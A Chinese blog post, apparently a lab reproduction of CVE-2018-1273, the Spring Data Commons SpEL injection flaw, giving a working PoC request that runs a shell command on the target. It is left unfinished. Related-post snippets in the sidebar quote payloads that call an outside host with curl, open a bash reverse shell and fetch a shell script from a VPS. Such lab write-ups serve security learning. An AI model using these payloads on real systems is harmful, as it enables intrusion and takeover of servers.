spring 代码执⾏ (CVE-2018-1273)漏洞

已于 2024-08-07 19:37:36 修改
阅读量461 收藏
点赞数 12
文章标签: spring java 数据库
于 2024-08-07 19:37:25 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2201_75891821/article/details/140999258
版权

一 漏洞简介

Spring Data 是⼀个⽤于简化数据库访问,并⽀持云服务的开源框架,Spring Data Commons 是 Spring Data 下所有⼦项⽬共享的基础框架。Spring Data Commons 在 2.0.5 及 以前版本中,存在⼀处 SpEL 表达式注⼊漏洞,攻击者可以注⼊恶意 SpEL 表达式以执⾏任意命令       

1.1漏洞利用 

1.2漏洞复现

访问

然后填写注册信息,抓包

加入POC

username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("t ouch /tmp/zcc")]=&password=&repeatedPassword=

进入kali终端发现成功写入

 

环境出问题了 改天补齐

苏北辰-
关注
  • 12
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Spring框架漏洞解析之二(CVE-2022-22965、CVE-2022-22947、CVE-2018-1273CVE-2018-1270)
Continuejww的博客
10-20 571
CVE-2022-22965是在Java 9的环境下,引入了class.module.classLoader,导致了CVE-2010-1622漏洞补丁的绕过,JDK9中存在可以绕过黑名单禁用的类,导致了这个漏洞Spring Cloud Gateway 提供了一个库,用于在 Spring WebFlux 之上构建 API 网关。
spring 代码行 (CVE-2018-1273
qq_23003811的博客
07-17 323
Spring Data是一个用于简化数据库访问,并支持云服务的开源框架,Spring Data Commons是Spring Data下所有子项目共享的基础框架。5、打开vps服务器临时web服务器,这样就可以通过91.208.73.100:7777/shell.sh访问到我们制作好的文件。6、使用burp发送数据包,在被攻击的服务器上下载我们的shell。7、使用burp发送数据包,在被攻击的服务器上行下载好的shell。4、在自己的vps服务器创一个shell.sh文件,内容为反弹连接。
spring(CVE-2018-1273)远程代码漏洞复现
热门推荐
勤劳的码农的博客
03-12 1万+
Spring Data 是Spring框架中提供底层数据访问的项目模块,Spring Data Commons 是一个共用的基础模块。此模块对特殊属性处理时会使用SpEl表达式,导致攻击者可以通过构造特殊的URL请求,造成服务端远程代码行。在2.0.5及以前版本中,存在一处SpEL表达式注入漏洞,攻击者可以注入恶意SpEL表达式以行任意命令。Spring在补丁中使用更加安全的SimpleEvaluationContext替换了StandardEvaluationContext。
[Vulfocus解题系列]spring 代码行 (CVE-2018-1273
00勇士王子的博客
01-05 3312
简介 Spring Expression Language是一个功能强大的表达式 语言支持查询和在运行时操作一个对象图。 攻击者可以在未获得授权的情况下,将精心制作的请求参数注入到存在该漏洞的服务器上,从而发起远程代码行攻击。 复现过程 使用在线靶场 抓包 改包,将data数据改为下面的payload username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("curl http://m9c5f3.ceye.io/
spring 代码行 (CVE-2018-1273)复现
weixin_63124284的博客
10-29 1066
Spring Expression Language是一个功能强大的表达式 语言支持查询和在运行时操作一个对象图。 攻击者可以在未获得授权的情况下,将精心制作的请求参数注入到存在该漏洞的服务器上,从而发起远程代码行攻击。 ​
spring:CVE-2018:1273
weixin_69670995的博客
05-18 469
使用浏览器访问users,并输入随便东西。在kali上使用vim新建测试txt文件。使用dirsearch工具进行目录扫描。使用python3开启临时http。修改payload,让靶机行木马。修改payload,提升木马权限。发到重发器,并修改post传参。返回200,上传txt文件成功。修改paylaod,上传木马。行成功,返回靶机shell。使用burp抓包,点击注册。返回200,上传成功。
CVE-2018-1273漏洞复现日志+IDS规则编写
weixin_41174502的博客
07-25 1656
CVE-2018-1273(Spring Data Commons) 远程命令漏洞 漏洞描述: Spring Data Commons(1.13至1.13.10之前的版本,2.0至2.0.5的版本以及较旧的不受支持的版本)包含由于特殊元素的不正确中和而导致的属性绑定器漏洞。未经身份验证的远程恶意用户(或攻击者)可以针对Spring Data REST支持的HTTP资源提供特制的请求参数,或者使用Spring Data的基于投影的请求有效负载绑定可能导致远程代码攻击。总结来说这是一个spel表
Spring Data Commons 远程命令漏洞CVE-2018-1273
liangjiao_shou的博客
07-25 145
Spring Data是一个用于简化数据库访问,并支持云服务的开源框架,Spring Data Commons是Spring Data下所有子项目共享的基础框架。Spring Data Commons 在2.0.5及以前版本中,存在一处SpEL表达式注入漏洞,攻击者可以注入恶意SpEL表达式以行任意命令。Spring Data Commons 远程命令漏洞CVE-2018-1273)bp进行抓包,然后进行修改。
vulhub中springCVE-2018-1273漏洞复现
yougexiaojiuguan的博客
11-30 1005
学习过程中的记录,也是问了方便以后查看
CVE-2018-3191利用exp
01-08
压缩包中的"CVE-2018-3191利用exp"可能包含了利用这个漏洞的具体exploit代码或详细步骤,这对于研究漏洞、测试防御措施或进行应急响应都是很有价值的资源。然而,需要注意的是,这类工具和信息必须谨慎处理,避免在...
poc-cve-2018-1273:CVE-2018-1273的POC
05-15
CVE-2018-1273 Spring Data Commons(1.13至1.13.10之前的版本,2.0至2.0.5的版本以及较早的不受支持的版本)包含由于特殊元素的不正确中和导致的属性绑定器漏洞。 未经身份验证的远程恶意用户(或攻击者)可以针对...
漏洞复现—Spring CVE-2016-4977/CVE-2017-4971/CVE-2017-8046/CVE-2018-1270/CVE-2018-1273
weixin_45556536的博客
12-24 1342
CVE-2017-4971 // 注意反弹的端口和IP修改,反弹语句需要url编码 &_(new+java.lang.ProcessBuilder("bash","-c","bash+-i+>%26+/dev/tcp/攻击机IP/端口号+0>%261")).start()=vulhub
spring揭秘19-spring事务01-事务抽象
PacosonSWJTU的博客
09-08 1295
1)spring对事务元素进行抽象, 客户端仅按照统一的编程模型管理事务,而不用关心数据访问技术以及具体要访问什么类型的事务资源;此外:spring事务管理与spring提供的数据访问技术(如JdbcTemplate)进行结合;2)spring事务框架设计的基本原则: 让事务管理逻辑与数据访问逻辑解耦;spring揭秘15-spring集成数据访问技术(orm框架)总结事务隔离级别;isolation;事务传播行为;事务超时时间;timeout;是否为只读事务;readOnly;
Spring05——注解开发定义bean、Spring纯注解开发模式
后端小白个人学习记录
09-08 883
注解开发定义bean、Spring纯注解开发模式
SpringSecurity原理解析(二):认证流程
liang8999的博客
09-08 1020
attemptAuthentication 方法在子类UsernamePasswordAuthenticationFilter 中实现的。attemptAuthentication方法的作用是获取Authentication对象其实就是对应的认证过程,用该AuthenticationProvider的authenticate函数认证,如果认证成功则整个认证过程结束。AuthenticationManager接口中就定义了一个方法authenticate方法,用于处理认证的请求;
基于SpringBoot的旅游管理系统
heye0910032的博客
09-08 399
随着科技的发展,旅游管理系统的信息化成为提升旅游服务效率的关键。本系统采用JSP技术和SpringBoot框架,结合MySQL数据库,旨在实现一个功能全面、操作简便、安全可靠的旅游管理平台。系统通过需求分析、系统设计、功能实现和测试,确保了良好的用户体验和数据处理能力,为旅游业务的现代化管理提供了强有力的技术支持。本研究成功开发了一个基于SpringBoot的旅游管理系统,该系统通过集成多种旅游管理功能,显著提高了旅游服务的效率和质量。系统的用户友好界面和强大的后端功能,使得管理员和用户都能从中受益。
【安全漏洞SpringBoot + SpringSecurity CORS跨域资源共享配置
weixin_42925623的博客
09-05 1584
今天我们就来了解一下这个CROS漏洞,并记录一下在整合了springSecurity这一套安全框架下的springboot系统中如何在后端过滤器中通过正确注册WebMvcConfigurer bean来配置CORS的全局设置,实现对非白名单访问源的拦截。
springboot】父子工程项目搭建
最新发布
qq_40878316的博客
09-11 287
可以在idea右侧页签栏中点击【Maven】查看父子工程结构及其拥有依赖。2.选择合适的springboot版本,点击【完成】,即创建父工程完毕。2.选择新建Maven工程(注意此处的SDK需与父工程保持一致)1.右键项目名->新建(news)->模块(Module)3.填写子工程模块信息(此处组id与父工程保持一致)可点击右上角设置图标,点击选择【将模块分组】即可。2.子工程编写启动类及controller类。,能正常输入内容,则表示父子工程无问题。1.新建一个spring项目。
spring boot CVE-2024-22243 漏洞 升级spring boot
06-01
Spring Boot是一个快速开发框架,它使得构建基于Spring的应用程序更加容易。Spring Boot为开发人员提供了一个基础框架,使得他们可以集中精力于业务逻辑的实现,而不必去关注Spring框架中繁琐的配置。它还提供了许多有用的功能,如自动配置、内嵌式Web服务器、健康检查、度量等。 至于CVE-2024-22243漏洞,它是Spring Boot在处理某些HTTP请求时的一个安全漏洞。攻击者可以利用这个漏洞行恶意代码或者进行其他的攻击行为。如果您正在使用Spring Boot,请尽快升级到最新版本,以避免受到此漏洞的影响。 升级Spring Boot的方法很简单,只需将项目中的Spring Boot相关依赖项更新到最新版本即可。您可以参考Spring Boot官方文档或者相关社区的升级指南来进行操作。另外,为了确保您的应用程序安全,建议您定期关注安全公告并及时进行升级。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值